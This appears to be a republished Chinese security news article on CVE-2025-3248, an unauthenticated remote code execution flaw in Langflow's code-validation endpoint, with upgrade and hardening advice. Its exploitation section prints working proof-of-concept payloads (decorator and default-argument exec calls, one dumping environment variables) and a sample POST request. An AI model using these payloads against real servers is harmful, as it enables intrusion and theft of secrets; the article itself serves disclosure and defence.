安全客周刊 前天 10:30
CVE-2025-3248:Langflow 开源平台严重远程代码执行漏洞威胁 AI 工作流安全
index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html

 

网络安全研究人员发现 Langflow 存在高危远程代码执行漏洞(CVE-2025-3248),影响 1.3.0 之前的所有版本。攻击者无需身份验证即可利用该漏洞在服务器上执行任意命令,威胁敏感数据和系统安全。漏洞位于 /api/v1/validate/code 端点,由于不当调用 Python 的 exec() 函数且缺乏身份验证和沙盒保护,攻击者可通过函数装饰器或默认参数值注入恶意代码。建议使用 Langflow 的企业立即升级到 1.3.0 或更高版本,并采取网络分段、零信任架构和部署监控解决方案等措施。

🚨Langflow 存在远程代码执行漏洞(CVE-2025-3248),CVSS 评分高达 9.8,属于严重级别,攻击者可以未经授权访问系统并执行命令。

🛡️该漏洞影响 Langflow 1.3.0 之前的版本,源于 /api/v1/validate/code 端点不安全地使用了 Python 的 exec() 函数,缺少身份验证和沙盒机制。

🧑‍💻攻击者可以通过两种方式注入恶意代码:一是利用函数装饰器,这些装饰器在代码处理过程中会立即执行;二是利用函数定义中的默认参数值,它们在抽象语法树(AST)处理阶段也会被求值。

✅缓解措施包括立即升级到 Langflow 1.3.0 或更高版本,该版本已对存在漏洞的端点进行身份验证,并建议实施网络分段和零信任架构。

发布时间 : 2025-04-27 10:27:11

网络安全研究人员在 Langflow 中发现了一个严重的远程代码执行(RCE)漏洞。Langflow 是一个被广泛用于以可视化方式构建由人工智能驱动的智能体和工作流程的开源平台。

这个高严重性漏洞被编号为 CVE-2025-3248,其通用漏洞评分系统(CVSS)评分为 9.8,属于严重级别。

该安全漏洞影响 1.3.0 版本之前的所有 Langflow 版本,攻击者无需身份验证即可在存在漏洞的服务器上执行任意命令,这有可能危及敏感数据和系统安全。

该漏洞专门针对 Langflow 的 /api/v1/validate/code 端点,该端点在用户提供的代码上不当调用了 Python 的内置函数 exec ()。

这一实现缺乏适当的身份验证检查和沙盒保护机制,为恶意行为者提供了一个危险的攻击面。

在其人工智能开发工作流程中使用 Langflow 的企业面临着重大风险,因为攻击者可以利用这一漏洞获得对系统的未经授权访问,并以应用服务器的权限执行命令。

Zscaler 的研究人员发现,该漏洞源于 Python 在处理函数定义时的特性,即在函数定义处理过程中,装饰器和默认参数值会被立即求值。

这一特性使得嵌入在这些结构中的恶意代码能够在抽象语法树(AST)处理阶段执行。

研究人员强调,这一漏洞表明在处理动态代码执行时,实施适当的身份验证和沙盒措施至关重要。

攻击者可以利用这个漏洞针对可公开访问的 Langflow 实例,或者通过各种攻击途径入侵内部部署的系统。

一旦获得访问权限,攻击者就可以利用这个存在漏洞的端点建立持久访问权限、窃取数据,或者在受影响的网络中进行横向移动。

鉴于该漏洞易于被利用且容易被访问,安全专家敦促立即修复这一漏洞。

对技术实现的研究表明,Langflow 的代码验证机制试图在评估特定组件(包括函数定义)之前,将用户提交的代码解析为抽象语法树(AST)。

这个过程涉及导入指定的模块并执行函数定义以验证其结构,但关键的是未能限制执行上下文。

利用机制

攻击方以创造性的方式利用了 Python 的函数定义特性来实现代码执行。

当 Langflow 通过其验证端点处理代码时,攻击者可以使用两种主要方法注入恶意负载。

第一种方法是将命令嵌入函数装饰器中,这些装饰器在代码处理过程中会立即执行。例如:

@exec(“import os; os.system(‘id > /tmp/pwned’)”)

def foo():

pass

第二种方法是利用函数定义中的默认参数值,这些默认参数值在抽象语法树(AST)处理阶段也会被求值:

def foo(cmd=exec(“import(‘subprocess’).check_output([‘env’])”)):

pass

当攻击者通过 POST 请求将这些恶意负载发送到存在漏洞的端点时,攻击就会发生:

POST /api/v1/validate/code HTTP/1.1

Host: vuln-test-langflow.example.com

Content-Type: application/json

Content-Length: 172

{

“code”: “@exec(“with open(‘hacked.txt’, ‘w’) as f: f.write(‘The server has been compromised’)”)\ndef foo():\n pass”

}

完整的攻击链条展示了攻击者如何从针对存在漏洞的端点,逐步实现对服务器的代码执行。

虽然服务器的响应看似正常,但恶意代码会在后台悄然执行,有可能创建后门或窃取数据。

强烈建议使用 Langflow 的企业立即升级到 1.3.0 或更高版本,该版本对存在漏洞的端点要求进行身份验证。

此外,实施网络分段、通过零信任架构限制访问,以及部署监控解决方案,有助于在进行升级的同时降低风险。

商务合作,文章发布请联系 anquanke@360.cn

安全客

Fish AI Reader

Fish AI Reader

AI辅助创作,多种专业模板,深度分析,高质量内容生成。从观点提取到深度思考,FishAI为您提供全方位的创作支持。新版本引入自定义参数,让您的创作更加个性化和精准。

FishAI

FishAI

鱼阅,AI 时代的下一个智能信息助手,助你摆脱信息焦虑

联系邮箱 441953276@qq.com

相关标签

Langflow 远程代码执行 网络安全 漏洞 安全更新
相关文章